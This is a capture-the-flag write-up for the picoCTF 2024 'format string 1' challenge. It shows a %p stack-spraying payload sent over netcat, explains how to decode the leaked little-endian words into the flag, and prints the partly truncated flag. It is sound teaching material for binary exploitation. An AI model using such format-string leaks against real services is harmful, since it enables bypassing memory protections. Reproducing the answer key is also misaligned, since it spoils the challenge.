format string 1

Published: April 3, 2024

Description

Patrick and Sponge Bob were really happy with those orders you made for them, but now they're curious about the secret menu. Find it, and along the way, maybe you'll find something else of interest!

Netcat + CyberChef

Download the binary/source for local testing, then connect to the remote menu with netcat.

Have CyberChef (or another hex→ASCII tool) ready to decode the leaked pointers.

wget https://artifacts.picoctf.net/c_mimas/50/vuln && \
wget https://artifacts.picoctf.net/c_mimas/50/vuln.c && \
nc mimas.picoctf.net 57322

Solution

This builds on format string 0 by requiring you to leak stack data instead of just selecting menu items. Once you master stack leaks, advance to format string 2 to learn memory overwrites with pwntools. The Buffer Overflow and Binary Exploitation guide explains format string stack leaks and writes in depth.
  1. Step 1Spray the stack
    Send a payload of repeated %p separated by commas to dump many stack words at once.
    %p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
    Learn more

    The %p format specifier prints a pointer value in hexadecimal, typically prefixed with 0x. Unlike %d (decimal integer) or %s (string), %p always prints the raw word-sized value from the stack without trying to dereference it - making it the safest specifier for stack spraying since it won't crash from an invalid pointer.

    Separating specifiers with commas (or any printable delimiter) makes the output easy to parse: each comma-separated value corresponds to one stack word. The stack layout on a typical x86-64 Linux binary includes the format string argument itself, saved registers, local variables, return addresses, and often the flag or a pointer to it - if it was recently in scope.

    The number of %p specifiers determines how far up the stack you read. Each specifier advances the "argument pointer" by one word (8 bytes on 64-bit). Spraying 24 specifiers reads 24 words = 192 bytes of stack data. Professional exploit developers use a direct parameter access syntax like %15$p to read the 15th stack argument directly, without the preceding 14 specifiers - cleaner but requires knowing the offset first.

    Stack spraying with format strings is the first step in many format string exploits. After mapping the stack layout, attackers locate the specific offset that holds useful addresses (like a stack canary, a return address, or the address of a buffer containing the flag) and target them precisely.

  2. Step 2Filter the useful words
    Among the outputs you'll see 0x7b4654436f636970 etc. These 0x-prefixed pointers are ASCII chunks of the flag, but they appear in reverse order.
    Learn more

    The values 0x7b4654436f636970 etc. are 8-byte (64-bit) words read directly from the stack, printed as hex. To understand why they contain flag data: when C stores a string on the stack or in a register, its bytes appear in memory in sequential order. When read as a 64-bit integer, the bytes are interpreted in little-endian order - so the last character of an 8-character chunk appears in the most significant byte and is printed first in the hex representation.

    Decoding: 0x7b4654436f636970 → bytes (big-endian display) 7b 46 54 43 6f 63 69 70{FTCocip → reversed (little-endian) → picoCTF{. This reversal is a constant source of confusion in format string exploitation and must be accounted for when reassembling leaked data.

    The fact that flag bytes appear on the stack at all is because the program likely stored the flag string in a local variable or passed it as a function argument at some point. The stack is not garbage-collected - values persist until overwritten. This persistence is what makes stack leaking so powerful: data that was "done with" by the program may still be recoverable by an attacker who reads the stack contents.

  3. Step 3Decode and reorder
    Copy the five flag dwords into CyberChef, apply From Hex then Reverse. Reordering the chunks (last to first) yields picoCTF{7y13_4x4_f14g_b54n1m41_5d7...}.
    Learn more

    CyberChef's Reverse operation handles the endianness swap: since each 8-byte chunk was read in little-endian byte order but printed most-significant-byte-first, reversing the bytes of each chunk restores the original character order. The operation works at the byte level, not the string level - which is why you process each chunk individually before concatenating.

    The chunk reordering (last to first) is because the stack grows downward on x86 but is printed from low to high addresses - or vice versa, depending on where in the stack the string resides relative to the stack pointer. Understanding the stack's direction and the relationship between the format string's argument pointer and the stack pointer is essential for reliable exploit development.

    This manual decode-and-reorder process is exactly what pwntools automates. The unpack() function and struct module in Python handle endianness conversions, and pwntools' format string utilities can automate the entire reconnaissance phase. Learning the manual process first builds the intuition needed to debug automated exploits when they fail.

    In real-world attacks, leaked stack data can reveal: ASLR bypass addresses (defeating Address Space Layout Randomization), stack canary values (bypassing stack smashing protection), and return addresses (for ROP chain construction). Format string vulnerabilities that leak stack data are therefore extremely high-severity even if they don't directly allow arbitrary write.

Flag

picoCTF{7y13_4x4_f14g_b54n1m41_5d7...}

Want more picoCTF 2024 writeups?

Useful tools for Binary Exploitation

Related reading

Do these first

What to try next